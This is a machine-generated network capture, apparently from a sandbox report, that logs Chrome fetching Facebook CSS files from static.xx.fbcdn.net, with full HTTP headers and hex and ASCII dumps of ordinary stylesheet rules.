                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC16384INData Raw: 3a 61 75 74 6f 7d 2e 78 31 34 63 69 61 77 75 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 78 31 34 69 68 71 39 34 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 30 2c 31 32 30 2c 31 39 30 2c 31 29 7d 2e 78 31 34 70 6a 71 63 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 31 2c 32 31 34 2c 31 38 33 2c 2e 36 29 7d 2e 78 31 34 71 66 78 62 65 7b 77 69 64 74 68 3a 33 36 70 78 7d 2e 78 31 34 72 76 77 72 70 7b 77 69 64 74 68 3a 36 30 30 70 78 7d 2e 78 31 34 76 71 71 61 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 7d 2e 78 31 35 38 6b 65 37 72 7b 68 65 69 67 68 74 3a 32 31 70 78 7d 2e 78 31 35 6f 6b 71 36 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67
                                                                                                                                                                                                                                Data Ascii: :auto}.x14ciawu{padding-top:7px!important}.x14ihq94{border-top-color:rgba(10,120,190,1)}.x14pjqc{border-top-color:rgba(251,214,183,.6)}.x14qfxbe{width:36px}.x14rvwrp{width:600px}.x14vqqas{margin-top:12px}.x158ke7r{height:21px}.x15okq62{border-top-color:rg
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC12954INData Raw: 7d 2e 78 74 38 68 6b 6f 30 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 2c 31 31 39 2c 32 34 32 2c 2e 36 29 7d 2e 78 74 62 68 38 38 75 7b 68 65 69 67 68 74 3a 32 32 35 70 78 7d 2e 78 74 66 39 32 6d 75 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 35 32 2c 37 32 2c 38 34 2c 31 29 7d 2e 78 74 68 6b 69 70 35 7b 77 69 64 74 68 3a 32 37 30 70 78 7d 2e 78 74 68 79 32 75 79 7b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 78 75 30 61 61 6f 35 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 36 70 78 7d 2e 78 75 33 78 72 69 74 7b 68 65 69 67 68 74 3a 33 32 30 70 78 7d 2e 78 75 39 36 75 30 33 7b 6c 65 66 74 3a 30 7d 2e 78 75 62 70 65 6d 37 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 72 67 62 61
                                                                                                                                                                                                                                Data Ascii: }.xt8hko0{border-bottom-color:rgba(24,119,242,.6)}.xtbh88u{height:225px}.xtf92mu{border-top-color:rgba(52,72,84,1)}.xthkip5{width:270px}.xthy2uy{max-width:50%}.xu0aao5{min-height:36px}.xu3xrit{height:320px}.xu96u03{left:0}.xubpem7{border-bottom-color:rgba


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                136192.168.2.450068157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC604OUTGET /rsrc.php/v3/yI/l/0,cross/X9tSrDjPzyV.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: qwveOF1eybd0iBTCw/n0EA==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:54:14 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: DqfcrzNA0uQa4BkfDuK1WftcK/lqGMhn5spwzmPnZy5d5aDyEVrYa+aUCp7Lp3Pwib0XmwecavCNw9NDC3ikMA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:00 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 44745
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC15878INData Raw: 5f 35 38 2d 30 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 35 38 2d 30 20 69 6e 70 75 74 2e 5f 35 38 61 6c 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 5f 35 38 2d 32 20 2e 5f 35 38 61 6b 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 74 65 78 74 3b 6d 61 72 67 69 6e 3a 30 20 32 70 78 20 32 70 78 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 5f 35 38 2d 32 20 2e 5f 35 38 61 6c 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 5f 35
                                                                                                                                                                                                                                Data Ascii: _58-0{float:left;max-width:100%}._58-0 input._58al{border-left:.1px solid transparent}._58-2 ._58ak{border:none;cursor:text;margin:0 2px 2px 0;max-width:100%;overflow:hidden}._58-2 ._58al{border:none;display:inline-block;margin:0;vertical-align:middle}._5
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC16384INData Raw: 78 7d 2e 75 69 43 6c 6f 73 65 42 75 74 74 6f 6e 49 6e 76 65 72 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 72 2f 33 33 52 70 69 52 79 67 78 41 72 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 6c 65 66 74 20 2d 31 36 70 78 7d 2e 75 69 43 6c 6f 73 65 42 75 74 74 6f 6e 47 72 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 76 2f 72 2f 42 66 79 62 6f 65 44 44 4d 74 77 2e 70 6e 67 29 7d 2e 75 69 43 6c 6f 73 65 42 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 75 69 43 6c 6f 73 65 42 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 6c 65 66 74 20 2d
                                                                                                                                                                                                                                Data Ascii: x}.uiCloseButtonInverted{background-image:url(/rsrc.php/v3/yo/r/33RpiRygxAr.png);background-position:left -16px}.uiCloseButtonGray{background-image:url(/rsrc.php/v3/yv/r/BfyboeDDMtw.png)}.uiCloseButton:hover,.uiCloseButton:focus{background-position:left -
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC12482INData Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 33 31 39 70 78 20 2d 33 36 33 70 78 7d 2e 73 70 5f 4a 53 75 6a 6d 56 6d 45 57 68 47 2e 73 78 5f 32 64 37 35 34 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 35 31 70 78 20 2d 33 38 30 70 78 7d 2e 73 70 5f 4a 53 75 6a 6d 56 6d 45 57 68 47 2e 73 78 5f 65 36 35 65 33 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 36 38 70 78 20 2d 33 38 30 70 78 7d 2e 73 70 5f 4a 53 75 6a 6d 56 6d 45 57 68 47 2e 73 78 5f 63 34 62 33 64 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 38 35 70 78 20 2d 33 38 30 70 78 7d 2e 73 70 5f 4a 53 75 6a 6d 56 6d 45 57 68 47 2e 73 78 5f 32 65 32 39 61 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73
                                                                                                                                                                                                                                Data Ascii: {background-position:-319px -363px}.sp_JSujmVmEWhG.sx_2d754e{background-position:-251px -380px}.sp_JSujmVmEWhG.sx_e65e34{background-position:-268px -380px}.sp_JSujmVmEWhG.sx_c4b3d4{background-position:-285px -380px}.sp_JSujmVmEWhG.sx_2e29a2{background-pos


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                137192.168.2.450066157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC604OUTGET /rsrc.php/v3/yo/l/0,cross/b-9VvptAdOY.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: oMqNpGGuUpb11X47T6V9kA==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: GsIV+MnUuaTV6IVt40Q6NEv5VyD0kFYLK0JuNZ9MbZf7g4eAPWZmZc30DGi3mbp66rENeCPJy6ctANrAwMe0Yg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:00 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 11432
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC11431INData Raw: 5f 39 61 79 61 7b 6d 61 72 67 69 6e 3a 31 32 70 78 20 31 32 70 78 20 30 20 31 32 70 78 7d 2e 5f 39 61 79 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 6d 61 72 67 69 6e 3a 32 34 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 34 30 70 78 7d 2e 5f 39 61 79 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 30 29 3b 68 65 69 67 68 74 3a 35 30 30 70 78 3b 6d 61 72 67 69 6e 3a 32 34 70 78 20 61 75 74 6f 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 33 34 30 70 78 7d 2e 5f 39 61 79
                                                                                                                                                                                                                                Data Ascii: _9aya{margin:12px 12px 0 12px}._9ayn{background-color:#fff;border:1px solid rgba(0, 0, 0, .3);margin:24px auto;width:340px}._9ayf{background-color:#fff;border:1px solid rgba(0, 0, 0, .20);height:500px;margin:24px auto;pointer-events:none;width:340px}._9ay


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                138192.168.2.450067157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC604OUTGET /rsrc.php/v3/yF/l/0,cross/0QTORSxRVO1.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: hl1UEJ28pe47Gb3dyK1Bsw==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:16:59 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: ScoyZpzERIF5aJkUzKb4dpMME+lJWB+Xon6hHrIowwuvQcQjnqxZT6A2MgxIurRhqpc1xfSt+sIdp6l/zfVJmQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:00 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 50754
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC15878INData Raw: 5f 61 67 6e 2d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 38 37 37 66 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 5f 61 67 6e 2d 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 5f 61 67 6e 2d 2e 5f 61 67 6e 5f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 62 65 64 66 30 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 5f 61 67 6e 7a 20 2e 5f 61 67 6e 2d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 61 67 6e 7a 3a 68 6f 76 65 72 20 2e 5f 61 67 6e 2d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 0a 2e 5f 61 67 6d 75 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69
                                                                                                                                                                                                                                Data Ascii: _agn-{background-color:#1877f2;border-radius:50%;height:20px;width:20px}._agn-:hover{cursor:pointer}._agn-._agn_{background-color:#ebedf0;cursor:default}._agnz ._agn-{display:none}._agnz:hover ._agn-{display:block}._agmu{background-color:#fff;border-radi
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC16384INData Raw: 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 78 62 38 71 62 38 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 78 62 6f 78 78 72 74 7b 6d 61 78 2d 77 69 64 74 68 3a 33 38 38 70 78 7d 2e 78 63 33 62 38 66 30 7b 68 65 69 67 68 74 3a 32 36 36 70 78 7d 2e 78 63 62 6b 69 6d 77 7b 68 65 69 67 68 74 3a 38 35 70 78 7d 2e 78 63 69 63 66 66 6f 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 78 63 78 68 6c 74 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 78 64 38 37 38 30 7a 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 2e 78 64 39 7a 77 6e 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 32 30 70 78 7d 2e 78 64 64 38 6a 73 66 7b 68 65 69 67 68 74 3a 35 32 70 78 7d 2e 78 64 6a 32 36 36 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a
                                                                                                                                                                                                                                Data Ascii: {max-width:100px}.xb8qb8r{margin-top:100px}.xboxxrt{max-width:388px}.xc3b8f0{height:266px}.xcbkimw{height:85px}.xcicffo{padding-right:10px}.xcxhlts{margin-top:15px}.xd8780z{margin-left:5px}.xd9zwnt{min-width:920px}.xdd8jsf{height:52px}.xdj266r{margin-top:
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC16384INData Raw: 6b 32 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 78 75 33 6a 35 62 33 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 78 75 72 62 30 68 61 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 38 70 78 7d 2e 78 75 78 77 31 66 74 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 78 77 33 71 63 63 66 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 34 70 78 7d 2e 78 77 6a 69 34 6f 33 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 7d 2e 78 77 6e 37 66 7a 32 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 2e 78 78 62 72 36 70 6c 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 34 70 78 7d 2e 78 78 79 6d 76 70 7a 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c
                                                                                                                                                                                                                                Data Ascii: k2{display:inline}.xu3j5b3{border-right-style:solid}.xurb0ha{padding-left:8px}.xuxw1ft{white-space:nowrap}.xw3qccf{margin-right:4px}.xwji4o3{transition-timing-function:ease}.xwn7fz2{line-height:1.3}.xxbr6pl{padding-right:24px}.xxymvpz{vertical-align:middl
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC2107INData Raw: 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 34 32 70 78 7d 2e 73 70 5f 79 39 50 37 57 72 42 79 70 53 6b 2e 73 78 5f 62 34 64 36 37 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 36 33 70 78 7d 2e 73 70 5f 79 39 50 37 57 72 42 79 70 53 6b 2e 73 78 5f 37 33 33 66 66 32 7b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 32 30 32 70 78 7d 2e 73 70 5f 79 39 50 37 57 72 42 79 70 53 6b 2e 73 78 5f 38 31 31 32 33 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 38 34 70 78 7d 2e 73 70 5f 79 39 50 37 57 72 42 79 70 53 6b 2e 73 78 5f 39 32 64 35 64 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31
                                                                                                                                                                                                                                Data Ascii: d-position:0 -42px}.sp_y9P7WrBypSk.sx_b4d678{background-position:0 -63px}.sp_y9P7WrBypSk.sx_733ff2{width:16px;height:16px;background-position:0 -202px}.sp_y9P7WrBypSk.sx_811239{background-position:0 -84px}.sp_y9P7WrBypSk.sx_92d5dd{background-position:0 -1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                139192.168.2.450069157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:00 UTC604OUTGET /rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
